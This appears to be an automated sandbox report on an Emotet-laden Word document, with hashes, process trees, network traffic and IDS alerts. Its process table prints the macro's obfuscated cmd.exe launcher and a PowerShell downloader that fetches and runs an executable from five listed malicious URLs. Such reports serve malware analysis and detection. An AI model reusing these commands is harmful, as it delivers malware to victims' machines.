File name: | doc.doc |
Full analysis: | https://app.any.run/tasks/f1d37dbd-f7df-4221-9d98-02680fbde69e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 19:20:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 15:02:00 2018, Last Saved Time/Date: Fri Dec 14 15:02:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 23, Security: 0 |
MD5: | 8169813BFF8352C8E419286C83650EE3 |
SHA1: | D2DF633926E0199F6839735EF3E39F0A1C8C248A |
SHA256: | 9DC729E8F1315C7C215038E8629ED5B0B6B2068D7751550107A7DBA966ABC2C0 |
SSDEEP: | 1536:Locn1kp59gxBK85fBeKaKsLjmv0+K5XyZN7Q2FKH+a9:E41k/W48cKsLjmvx1NEk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 15:02:00 |
ModifyDate: | 2018:12:14 15:02:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 25 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2940 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\doc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4052 | c:\HaJKihRtkdI\pCXQqijRV\palFkcEZwNzvVU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2600 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
120 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2752 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3164 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3408 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3492 | findstr Cons | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3700 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3264 | "C:\Users\admin\AppData\Local\Temp\749.exe" | C:\Users\admin\AppData\Local\Temp\749.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB4237EB.wmf | — | |
MD5:— | SHA256:— | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\350C431.wmf | — | |
MD5:— | SHA256:— | |||
3700 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4TK78HQ4W5S9THA1Z853.temp | — | |
MD5:— | SHA256:— | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$doc.doc | pgc | |
MD5:505B0F77A5A376EF2A21D3BC7C9F5FF2 | SHA256:009DFF448EC6430C52AA1E8D4BD4502D73C12B95A0DF5433E993DAB0EDEF850F | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6B01A4399B399324F54D1B8A2E65AF4E | SHA256:2053FC6E06AD503565098797E40EDDF8CC5E6604C5164B385EF69A4E5CF81581 | |||
3700 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247c26.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3700 | powershell.exe | C:\Users\admin\AppData\Local\Temp\749.exe | executable | |
MD5:27F7FDA215F8DE9528A480C61773A454 | SHA256:A30ED24D117AB71B256DBE9CB8EE56491E13282F050A3F8B44810DA9DCED9981 | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:5AC6966CA922F850D22BCFB748813888 | SHA256:7CB348FFBE5F04D82F9C3E5FA5C78F485B69683A65B16359C20F24B8B16F3B2B | |||
2940 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35ED7712.wmf | wmf | |
MD5:31ED22CAFB1ED5B9C922BDD3100C4E75 | SHA256:083314353C29E0216B08EA931F26633C6C2B7DE4E81976281053E80FA75D0BB2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2628 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
2628 | archivesymbol.exe | GET | — | 190.152.12.86:80 | http://190.152.12.86/ | EC | — | — | malicious |
3700 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
2628 | archivesymbol.exe | GET | — | 110.37.219.134:990 | http://110.37.219.134:990/ | PK | — | — | suspicious |
2628 | archivesymbol.exe | GET | — | 152.168.60.9:80 | http://152.168.60.9/ | AR | — | — | malicious |
3700 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2628 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
3700 | powershell.exe | 162.220.162.40:80 | evihdaf.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | malicious |
2628 | archivesymbol.exe | 190.152.12.86:80 | — | CORPORACION NACIONAL DE TELECOMUNICACIONES - CNT EP | EC | malicious |
2628 | archivesymbol.exe | 110.37.219.134:990 | — | National WiMAX/IMS environment | PK | suspicious |
2628 | archivesymbol.exe | 152.168.60.9:80 | — | CABLEVISION S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
evihdaf.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3700 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3700 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3700 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3700 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3700 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2628 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2628 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2628 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2628 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2628 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |